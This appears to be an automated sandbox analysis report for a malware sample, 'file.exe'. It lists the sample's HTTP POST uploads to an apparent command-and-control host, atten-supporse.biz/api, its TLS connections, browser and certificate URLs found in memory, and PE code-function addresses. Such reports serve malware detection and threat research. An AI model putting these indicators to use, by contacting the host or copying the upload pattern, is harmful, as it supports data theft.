Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NPJSDEQE47W6YAPLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570251Host: atten-supporse.biz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: atten-supporse.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz

Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2182636738.0000000005F7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183056768.0000000005F81000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2268418527.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205721535.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155923363.0000000005F91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155687834.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/
Source: file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155726723.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156002703.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/744-1-2
Source: file.exe, 00000000.00000003.2268418527.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182875665.000000000173E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205721535.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2268418527.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155923363.0000000005F91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270461946.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155687834.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271651117.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api
Source: file.exe, 00000000.00000003.2155923363.0000000005F91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155687834.0000000005F90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api1
Source: file.exe, 00000000.00000003.2268418527.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiq
Source: file.exe, 00000000.00000003.2268418527.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apis
Source: file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/api://%ProgramFiles%
Source: file.exe, 00000000.00000003.2206119101.0000000001746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205795166.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/apiUU2
Source: file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270461946.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271651117.0000000001759000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.bz/
Source: file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49713 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C76170	0_2_00C76170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5E2A9	0_2_00C5E2A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7C6D7	0_2_00C7C6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C8E690	0_2_00C8E690
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C587F0	0_2_00C587F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5A960	0_2_00C5A960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C66B7E	0_2_00C66B7E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C86C40	0_2_00C86C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C60FD6	0_2_00C60FD6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C86F90	0_2_00C86F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C733A0	0_2_00C733A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C715F0	0_2_00C715F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C597B0	0_2_00C597B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C89B90	0_2_00C89B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C8DCF0	0_2_00C8DCF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7BFD3	0_2_00C7BFD3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7BFDA	0_2_00C7BFDA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D240DE	0_2_00D240DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB40D4	0_2_00DB40D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C880D9	0_2_00C880D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC20CF	0_2_00DC20CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7C0C1	0_2_00D7C0C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE40D6	0_2_00CE40D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5A0F2	0_2_00D5A0F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D820F1	0_2_00D820F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB20F7	0_2_00DB20F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3A0FC	0_2_00D3A0FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA00EB	0_2_00DA00EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6E0E1	0_2_00D6E0E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDE091	0_2_00DDE091
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7409A	0_2_00D7409A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5609A	0_2_00D5609A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF209F	0_2_00CF209F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9608A	0_2_00D9608A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC2092	0_2_00CC2092
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7A089	0_2_00D7A089
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCA0BD	0_2_00DCA0BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2A0B0	0_2_00D2A0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DAE0BE	0_2_00DAE0BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB60B3	0_2_00DB60B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C780B0	0_2_00C780B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D500AC	0_2_00D500AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D8C055	0_2_00D8C055
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D86041	0_2_00D86041
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB6051	0_2_00CB6051
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC8050	0_2_00CC8050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF406F	0_2_00CF406F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C75F7D	0_2_00C75F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5E06A	0_2_00C5E06A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2606D	0_2_00D2606D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCE01C	0_2_00DCE01C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7E011	0_2_00D7E011
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE2003	0_2_00CE2003
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3001E	0_2_00D3001E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB8018	0_2_00CB8018
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBE00C	0_2_00DBE00C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3400E	0_2_00D3400E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCE03B	0_2_00CCE03B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C8A030	0_2_00C8A030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6002D	0_2_00D6002D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E201E6	0_2_00E201E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CBA1C3	0_2_00CBA1C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2E1C2	0_2_00D2E1C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D661C3	0_2_00D661C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C801D0	0_2_00C801D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD01C5	0_2_00DD01C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D121C8	0_2_00D121C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D461CB	0_2_00D461CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C581F0	0_2_00C581F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D401E8	0_2_00D401E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCE19D	0_2_00CCE19D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB2192	0_2_00CB2192
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC0195	0_2_00CC0195
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D021B4	0_2_00D021B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC81B0	0_2_00DC81B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D621A6	0_2_00D621A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DAC1A9	0_2_00DAC1A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD21B3	0_2_00CD21B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D8015C	0_2_00D8015C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD015B	0_2_00CD015B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D90141	0_2_00D90141
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D60173	0_2_00D60173
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0A169	0_2_00D0A169
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE8165	0_2_00DE8165
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D54115	0_2_00D54115
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7A100	0_2_00C7A100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3211D	0_2_00D3211D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5810E	0_2_00D5810E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DFE101	0_2_00DFE101
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9C13B	0_2_00D9C13B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE0137	0_2_00DE0137
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE4123	0_2_00DE4123
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB82CB	0_2_00CB82CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C8E2C0	0_2_00C8E2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D4A2C2	0_2_00D4A2C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D662CE	0_2_00D662CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF62E2	0_2_00CF62E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D762E4	0_2_00D762E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB02BB	0_2_00DB02BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D942B0	0_2_00D942B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCC2A7	0_2_00CCC2A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D362B8	0_2_00D362B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE22A2	0_2_00DE22A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D68254	0_2_00D68254
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEE246	0_2_00DEE246
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0424B	0_2_00D0424B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DAA241	0_2_00DAA241
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDA269	0_2_00DDA269
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C54270	0_2_00C54270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C72270	0_2_00C72270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB4271	0_2_00CB4271
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2218	0_2_00DA2218
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C56200	0_2_00C56200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D00203	0_2_00D00203
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDE209	0_2_00DDE209
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5E203	0_2_00D5E203
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D84229	0_2_00D84229
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D063D7	0_2_00D063D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DBA3CB	0_2_00DBA3CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9C3F2	0_2_00D9C3F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D383E1	0_2_00D383E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C8A3F0	0_2_00C8A3F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDE38D	0_2_00CDE38D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D02390	0_2_00D02390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CBA38E	0_2_00CBA38E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9E397	0_2_00D9E397
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC238C	0_2_00DC238C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE6388	0_2_00DE6388
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD8392	0_2_00CD8392
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D783BD	0_2_00D783BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D223BF	0_2_00D223BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D163A6	0_2_00D163A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC03A1	0_2_00DC03A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DAC35E	0_2_00DAC35E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE0348	0_2_00CE0348
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D26341	0_2_00D26341
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFE352	0_2_00CFE352
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1437F	0_2_00E1437F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6C360	0_2_00C6C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC430D	0_2_00CC430D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D4433A	0_2_00D4433A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D304D7	0_2_00D304D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6E4D2	0_2_00D6E4D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC24D0	0_2_00CC24D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3E4CF	0_2_00D3E4CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D184FB	0_2_00D184FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D544E4	0_2_00D544E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE24FC	0_2_00CE24FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D104E5	0_2_00D104E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB24F3	0_2_00CB24F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD44E7	0_2_00DD44E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB84E6	0_2_00DB84E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD448C	0_2_00CD448C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC648A	0_2_00DC648A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2A485	0_2_00D2A485
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCA491	0_2_00CCA491
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D8C485	0_2_00D8C485
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D484BC	0_2_00D484BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0E4AC	0_2_00D0E4AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D724A8	0_2_00D724A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9045D	0_2_00D9045D
